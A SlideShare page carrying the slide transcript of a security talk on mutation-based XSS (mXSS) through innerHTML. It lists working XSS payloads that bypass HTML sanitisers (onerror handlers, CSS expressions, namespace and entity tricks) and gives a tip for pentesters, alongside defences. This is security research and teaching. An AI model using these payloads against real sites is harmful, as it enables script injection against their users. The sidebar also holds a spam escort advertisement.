Chrome Devtools for beginners (v1.1)
 
JavaScript Days 2015: Security
JavaScript Days 2015: SecurityJavaScript Days 2015: Security
JavaScript Days 2015: Security
 
Pair Programming Mythbusters
Pair Programming MythbustersPair Programming Mythbusters
Pair Programming Mythbusters
 
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...
Mit Maintenance umgehen können- Fixt du noch Bugs oder lieferst du schon neue...
 
困った時のDev toolsの使い方(初心者向け)
困った時のDev toolsの使い方(初心者向け)困った時のDev toolsの使い方(初心者向け)
困った時のDev toolsの使い方(初心者向け)
 
Melania caraconcea lucrare de disertatie
Melania caraconcea lucrare de disertatieMelania caraconcea lucrare de disertatie
Melania caraconcea lucrare de disertatie
 
Creativitate si inventica [pdf]
Creativitate si inventica [pdf]Creativitate si inventica [pdf]
Creativitate si inventica [pdf]
 
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript APIHTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
HTML5のセキュリティ もうちょい詳しく- HTML5セキュリティその3 : JavaScript API
 

Similar to The innerHTML Apocalypse

An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015CODE BLUE
 
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)PROIDEA
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack
 
Code quality; patch quality
Code quality; patch qualityCode quality; patch quality
Code quality; patch qualitydn
 
Code quality. Patch quality
Code quality. Patch qualityCode quality. Patch quality
Code quality. Patch qualitymalcolmt
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupMario Heiderich
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class Chris Gates
 
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...Hernan Costante
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Stephan Chenette
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing DevelopmentCTruncer
 
jQuery Features to Avoid
jQuery Features to AvoidjQuery Features to Avoid
jQuery Features to Avoiddmethvin
 
Dev secops opsec, devsec, devops ?
Dev secops opsec, devsec, devops ?Dev secops opsec, devsec, devops ?
Dev secops opsec, devsec, devops ?Kris Buytaert
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteAndrew Sorensen
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedMinded Security
 
Pentester++
Pentester++Pentester++
Pentester++CTruncer
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfGiorgiRcheulishvili
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...44CON
 
Understanding & analyzing obfuscated malicious web scripts by Vikram Kharvi
Understanding & analyzing obfuscated malicious web scripts by Vikram KharviUnderstanding & analyzing obfuscated malicious web scripts by Vikram Kharvi
Understanding & analyzing obfuscated malicious web scripts by Vikram KharviCysinfo Cyber Security Community
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERNeotys
 

Similar to The innerHTML Apocalypse (20)

An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
 
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
CONFidence 2018: XSS is dead. We just don't get it (Mario Heiderich)
 
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFGStHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
StHack 2014 - Mario "@0x6D6172696F" Heiderich - JSMVCOMFG
 
Code quality; patch quality
Code quality; patch qualityCode quality; patch quality
Code quality; patch quality
 
Code quality. Patch quality
Code quality. Patch qualityCode quality. Patch quality
Code quality. Patch quality
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
 
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...
Eko10 - Security Monitoring for Big Infrastructures without a Million Dollar ...
 
Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007Automated JavaScript Deobfuscation - PacSec 2007
Automated JavaScript Deobfuscation - PacSec 2007
 
Pen Testing Development
Pen Testing DevelopmentPen Testing Development
Pen Testing Development
 
jQuery Features to Avoid
jQuery Features to AvoidjQuery Features to Avoid
jQuery Features to Avoid
 
Dev secops opsec, devsec, devops ?
Dev secops opsec, devsec, devops ?Dev secops opsec, devsec, devops ?
Dev secops opsec, devsec, devops ?
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
All of Javascript
All of JavascriptAll of Javascript
All of Javascript
 
Sandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession LearnedSandboxing JS and HTML. A lession Learned
Sandboxing JS and HTML. A lession Learned
 
Pentester++
Pentester++Pentester++
Pentester++
 
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdfEN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
EN - BlackHat US 2009 favorite XSS Filters-IDS and how to attack them.pdf
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
 
Understanding & analyzing obfuscated malicious web scripts by Vikram Kharvi
Understanding & analyzing obfuscated malicious web scripts by Vikram KharviUnderstanding & analyzing obfuscated malicious web scripts by Vikram Kharvi
Understanding & analyzing obfuscated malicious web scripts by Vikram Kharvi
 
PAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLERPAC 2019 virtual Christoph NEUMÜLLER
PAC 2019 virtual Christoph NEUMÜLLER
 

More from Mario Heiderich

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Mario Heiderich
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Mario Heiderich
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityMario Heiderich
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyMario Heiderich
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010Mario Heiderich
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009Mario Heiderich
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS SmackdownMario Heiderich
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!Mario Heiderich
 

More from Mario Heiderich (9)

Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
Copy & Pest - A case-study on the clipboard, blind trust and invisible cross-...
 
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
Locking the Throne Room - How ES5+ might change views on XSS and Client Side ...
 
Dev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT SecurityDev and Blind - Attacking the weakest Link in IT Security
Dev and Blind - Attacking the weakest Link in IT Security
 
HTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the UglyHTML5 - The Good, the Bad, the Ugly
HTML5 - The Good, the Bad, the Ugly
 
The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010The Future of Web Attacks - CONFidence 2010
The Future of Web Attacks - CONFidence 2010
 
Web Wuermer
Web WuermerWeb Wuermer
Web Wuermer
 
JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009JavaScript From Hell - CONFidence 2.0 2009
JavaScript From Hell - CONFidence 2.0 2009
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
I thought you were my friend!
I thought you were my friend!I thought you were my friend!
I thought you were my friend!
 

Recently uploaded

Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingTechSoup
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxiammrhaywood
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfchloefrazer622
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesFatimaKhan178732
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeThiyagu K
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104misteraugie
 
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...RKavithamani
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdfQucHHunhnh
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfJayanti Pande
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphThiyagu K
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Krashi Coaching
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3JemimahLaneBuaron
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfciinovamais
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityGeoBlogs
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionSafetyChain Software
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxVS Mahajan Coaching Centre
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Sapana Sha
 

Recently uploaded (20)

Grant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy ConsultingGrant Readiness 101 TechSoup and Remy Consulting
Grant Readiness 101 TechSoup and Remy Consulting
 
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptxSOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
SOCIAL AND HISTORICAL CONTEXT - LFTVD.pptx
 
Arihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdfArihant handbook biology for class 11 .pdf
Arihant handbook biology for class 11 .pdf
 
Staff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSDStaff of Color (SOC) Retention Efforts DDSD
Staff of Color (SOC) Retention Efforts DDSD
 
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"Mattingly "AI & Prompt Design: The Basics of Prompt Design"
Mattingly "AI & Prompt Design: The Basics of Prompt Design"
 
Separation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and ActinidesSeparation of Lanthanides/ Lanthanides and Actinides
Separation of Lanthanides/ Lanthanides and Actinides
 
Measures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and ModeMeasures of Central Tendency: Mean, Median and Mode
Measures of Central Tendency: Mean, Median and Mode
 
Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104Nutritional Needs Presentation - HLTH 104
Nutritional Needs Presentation - HLTH 104
 
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
Privatization and Disinvestment - Meaning, Objectives, Advantages and Disadva...
 
1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf1029-Danh muc Sach Giao Khoa khoi 6.pdf
1029-Danh muc Sach Giao Khoa khoi 6.pdf
 
Web & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdfWeb & Social Media Analytics Previous Year Question Paper.pdf
Web & Social Media Analytics Previous Year Question Paper.pdf
 
Z Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot GraphZ Score,T Score, Percential Rank and Box Plot Graph
Z Score,T Score, Percential Rank and Box Plot Graph
 
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdfTataKelola dan KamSiber Kecerdasan Buatan v022.pdf
TataKelola dan KamSiber Kecerdasan Buatan v022.pdf
 
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
Kisan Call Centre - To harness potential of ICT in Agriculture by answer farm...
 
Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3Q4-W6-Restating Informational Text Grade 3
Q4-W6-Restating Informational Text Grade 3
 
Activity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdfActivity 01 - Artificial Culture (1).pdf
Activity 01 - Artificial Culture (1).pdf
 
Paris 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activityParis 2024 Olympic Geographies - an activity
Paris 2024 Olympic Geographies - an activity
 
Mastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory InspectionMastering the Unannounced Regulatory Inspection
Mastering the Unannounced Regulatory Inspection
 
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptxOrganic Name Reactions for the students and aspirants of Chemistry12th.pptx
Organic Name Reactions for the students and aspirants of Chemistry12th.pptx
 
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111Call Girls in Dwarka Mor Delhi Contact Us 9654467111
Call Girls in Dwarka Mor Delhi Contact Us 9654467111
 

The innerHTML Apocalypse

  • 1. The innerHTML Apocalypse How mXSS attacks change everything we believed to know so far A presentation by Mario Heiderich mario@cure53.de || @0x6D6172696F
  • 2. Our Fellow Messenger ● Dr.-Ing. Mario Heiderich ● Researcher and Post-Doc, Ruhr-Uni Bochum – PhD Thesis on Client Side Security and Defense ● Founder of Cure53 – Penetration Testing Firm – Consulting, Workshops, Trainings – Simply the Best Company of the World ● Published author and international speaker – Specialized in HTML5 and SVG Security – JavaScript, XSS and Client Side Attacks ● HTML5 Security Cheatsheet – @0x6D6172696F – mario@cure53.de
  • 3. Research Focus ● Everything inside <> ● HTML 2.0 – 5.1 ● JavaScript / JScript, VBS ● Plug-ins and Controls ● Editable Rich-Text ● SVG, MathML, XLS, XDR ● CSS, Scriptless Attacks ● ES5 / ES6 ● DOM Clobbering ● No binary stuff. My brain cannot :) ● Offense ● Injection Scenarios ● Active File formats ● Parser Analysis ● Archeology & Legacy Porn ● Defense ● XSS Filter / WAF / IDS ● CSP, DOM-based XSS Filter ● DOM Policies ● DOM + Trust & Control
  • 4. Why? ● HTML on its way to ultimate power ● Websites and Applications ● Instant Messengers and Email Clients ● Local documentation and presentations ● Router Interfaces and coffee-machine UIs ● Medical Devices – according to this source ● Operating systems, Win8, Tizen ● HTML + DOM + JavaScript ● “I mean look at friggin' Gmail!” ● I measured the amount of JavaScript on 27th of Jan. 2013 ● It was exactly 3582,8 Kilobytes of text/javascript
  • 5. Defense ● Several layers of defense over the years ● Network-based defense, IDS/IPS, WAF ● Server-side defense, mod_security, others ● Client-side defense, XSS Filter, CSP, NoScript ● “We bypassed, they fixed.” ● A lot of documentation, sometimes good ones too! ● Hundreds of papers, talks, blog posts ● Those three horsemen are covered quite well!
  • 6. Horsemen? ● Reflected XSS ● The White Horse – “Purity”. Easy to understand, detect and prevent. ● Stored XSS ● The Red Horse – “War”. Harder to detect and prevent – where rich-text of benign nature is needed. ● DOMXSS ● The Black Horse – “Disease”. Harder to comprehend. Often complex, hard to detect and prevent.
  • 7. “But what's a proper apocalypse without...”
  • 9. “Enough with the kitsch, let's get technical”
  • 10. Assumptions ● Reflected XSS comes via URL / Parameters ● We can filter input properly ● Persistent XSS comes via POST / FILE ● We can filter output properly ● Tell good HTML apart from bad ● DOMXSS comes from DOM properties ● No unfiltered usage of DOMXSS sources ● We can be more careful with DOMXSS sinks ● We can create safer JavaScript business logic ● Following those rules + handling Uploads properly + setting some headers mitigates XSS. Right?
  • 11. That telling apart... ● Advanced filter libraries ● OWASP Antisamy / XSS Filter Project ● HTML Purifier ● SafeHTML ● jSoup ● Many others out there ● Used in Webmailers, CMS, Social Networks ● Intranet, Extranet, WWW, Messenger-Tools, Mail-Clients ● They are the major gateway between ● Fancy User-generated Rich-Text ● And a persistent XSS ● Those things work VERY well! ● Without them working well, shit would break
  • 12. “But what if we can fool those tools? Just ship around them. Every single one of them?”
  • 14. Decades Ago... ● MS added a convenient DOM property ● It was available in Internet Explorer 4 ● Allowed to manipulate the DOM... ● … without even manipulating it... ● … but have the browser do the work! ● element.innerHTML ● Direct access to the elements HTML content ● Read and write of course ● Browser does all the nasty DOM stuff internally
  • 15. Look at this // The DOM way var myId = "spanID"; var myDiv = document.getElementById("myDivId"); var mySpan = document.createElement('span'); var spanContent = document.createTextNode('Bla'); mySpan.id = mySpanId; mySpan.appendChild(spanContent); myDiv.appendChild(mySpan); // The innerHTML way var myId = "spanID"; var myDiv = document.getElementById("myDivId"); myDiv.innerHTML = '<span id="'+myId+'">Bla</span>';
  • 16. Compared ● Pro ● It's easy ● It's fast ● It's now a standard ● It just works ● It's got a big brother.. outerHTML ● Contra ● Bit bitchy with tables ● Slow on older browsers ● No XML ● Not as “true” as real DOM manipulation
  • 18. Rich Text Editors ● The basically exist because of innerHTML ● And of course contentEditable ● And they are everywhere ● CMS ● Webmailers ● Email Clients ● Publishing Tools
  • 19. “Now, what's the problem with all this?”
  • 20. Internals ● We might be naïve and assume: ● ƒ(ƒ(x)) ≡ ƒ(x) ● Idempotency ● An elements innerHTML matches it's actual content ● But it doesn't ● It's non-idempotent and changes! ● And that's usually even very good! ● Performance ● Bad markup that messes up structure ● Illegal markup in a sane DOM tree
  • 21. Examples ● We have a little test-suite for you ● Let's see some examples ● And why non-idempotency is actually good IN: <div>123 OUT: <div>123</div> IN: <Div/class=abc>123 OUT: <div class="abc">123</div> IN: <span><dIV>123</span> OUT: <span><div>123</div></span>
  • 22. Funny Stuff ● So browsers change the markup ● Sanitize, beautify, optimize ● There's nothing we can do about it ● And it often helps ● Some funny artifacts exist... ● Comments for instance ● Or try CDATA sections for a change... IN: <!-> OUT: <!-----> IN: <!--> OUT: <!----> IN: <![CDATA]> OUT: <!--[CDATA]-->
  • 23. “And what does it have to do with security again?”
  • 24. It was back in 2006... ● .. when a fellow desk-worker noticed a strange thing. Magical, even!
  • 25. The Broken Preview ● Sometimes print preview was bricked ● Attribute content bled into the document ● No obvious reason... ● Then Yosuke Hasegawa analyzed the problem ● One year later in 2007 ● And discovered the first pointer to mXSS
  • 26. Now let's have a look ● DEMO ● Requires IE8 or older
  • 27. IN: <img src="foo" alt="``onerror=alert(1)" /> OUT: <IMG alt=``onerror=alert(1) src="x">
  • 28. Pretty bad ● But not new ● Still, works like a charm! ● Update: A patch is on the way! ● Update II: Patch is out! ● But not new ● Did you like it though? ● Because we have “new” :)
  • 29. Unknown Elements ● Again, we open our test suite ● Requires IE9 or older ● Two variations – one of which is new ● The other discovered by LeverOne
  • 30. IN: <article xmlns="><img src=x onerror=alert(1)"></article> OUT: <?XML:NAMESPACE PREFIX = [default] ><img src=x onerror=alert(1) NS = "><img src=x onerror=alert(1)" /><article xmlns="><img src=x onerror=alert(1)"></article>
  • 31. IN: <article xmlns="x:img src=x onerror=alert(1) "> OUT: <img src=x onerror=alert(1) :article xmlns="x:img src=x onerror=alert(1) "></img src=x onerror=alert(1) :article>
  • 32. Not Entirely Bad ● Few websites allow xmlns ● Everybody allows (or will allow) <article> though ● Harmless HTML5 ● Alas it's a HTML4 browser – as is IE in older document modes ● Wait, what are those again? ● <meta http-equiv="X-UA-Compatible" content="IE=IE5" /> ● Force the browser to fall-back to an old mode ● Old features, old layout bugs... ● And more stuff to do with mutations
  • 33. “Now for some real bad things!”
  • 34. Style Attributes ● Everybody loves them ● It's just CSS, right? ● XSS filters tolerate them ● But watch their content closely! ● No CSS expressions ● No behaviors (HTC) or “scriptlets” (SCT) ● Not even absolute positioning... ● ...or negative margins, bloaty borders
  • 35. Let's have a look ● And use our test suite again ● All IE versions, older Firefox
  • 36. IN: <p style="font-family:'223bx:expression(alert(1))/*'"> OUT: <P style="FONT-FAMILY: ; x: expression(alert(1))"></P>
  • 37. “And there's so many variations!” And those are just for you, fellow conference attendees, they are not gonna be on the slides So enjoy!
  • 38. HTML Entities ● Chrome messed up with <textarea> ● Found and reported by Eduardo ● Firefox screwed up with SVG <svg><style>&ltimg src=x onerror=alert(1)&gt</svg> ● IE has problems with <listing> ● <listing>&ltimg src=x onerror=alert(1)&gt</listing> ● Let's have another look again and demo... ● Also...text/xhtml! ● All CDATA will be decoded! ● That's also why inline SVG and MathML add more fun
  • 39. Who is affected? ● Most existing HTML filters and sanitizers ● Thus the software they aim to protect ● HTML Purifier, funny, right? ● JSoup, AntiSamy, HTMLawed, you name it! ● Google Caja (not anymore since very recently) ● All tested Rich-Text Editors ● Most existing Web-Mailers ● This includes the big ones ● As well as open source tools and libraries ● Basically anything that obeys standards... ● .. and doesn't know about the problem
  • 40.
  • 41.
  • 42.
  • 44. Wait... it's encoded! <p style="font-family:'foo&amp;#x5c;27&am p;#x5c;3bx:expr&amp;#x65;ession(alert( 1))'"> Yep. Encoded. But does it matter? NO! mXSS mutations work recursively! Just access innerHTML twice! For your health!
  • 45.
  • 46. How to Protect? ● Fancy Websites ● Enforce standards mode ● Avoid getting framed, use XFO ● <!doctype html> ● Use CSP ● Motivate users to upgrade browsers ● Avoid SVG and MathML ● Actual Websites ● Patch your filter! ● Employ strict white-lists ● Avoid critical characters in HTML attribute values ● Be extremely paranoid about user-generated CSS ● Don't obey to standards ● Know the vulnerabilities And for Pentesters? Inject style attributes + backslash or ampersand and you have already won. Nothing goes? Use the back-tick trick.
  • 47. Alternatives ● mXSS Attacks rely on mutations ● Those we can mitigate in the DOM ● Behold... TrueHTML ● Here's a small demo ● We intercept any innerHTML access ● And serialize the markup... XML-style ● Mitigates a large quantity of attack vectors ● Not all though ● Know thy CDATA sections ● Avoid SVG whenever possible ● Inline-SVG is the devil :) And MathML isn't much better...
  • 48. Takeaway? ● So, what was in it for you? ● Pentester: New wildcard-bug pattern ● Developer: Infos to protect your app ● Browser: Pointer to a problem-zone to watch ● Specifier: Some hints for upcoming specs
  • 49.
  • 50. Wrapping it up ● Today we saw ● Some HTML, DOM and browser history ● Some old yet unknown attacks revisited ● Some very fresh attacks ● A “pentest joker” ● Some guidelines on how to defend ● The W3C's silver bullet. For 2015 maybe.
  • 51. The End ● Questions? ● Comments? ● Can I have a drink now? ● Credits to ● Gareth Heyes, Yosuke Hasegawa, LeverOne, ● Eduardo Vela, Dave Ross, Stefano Di Paola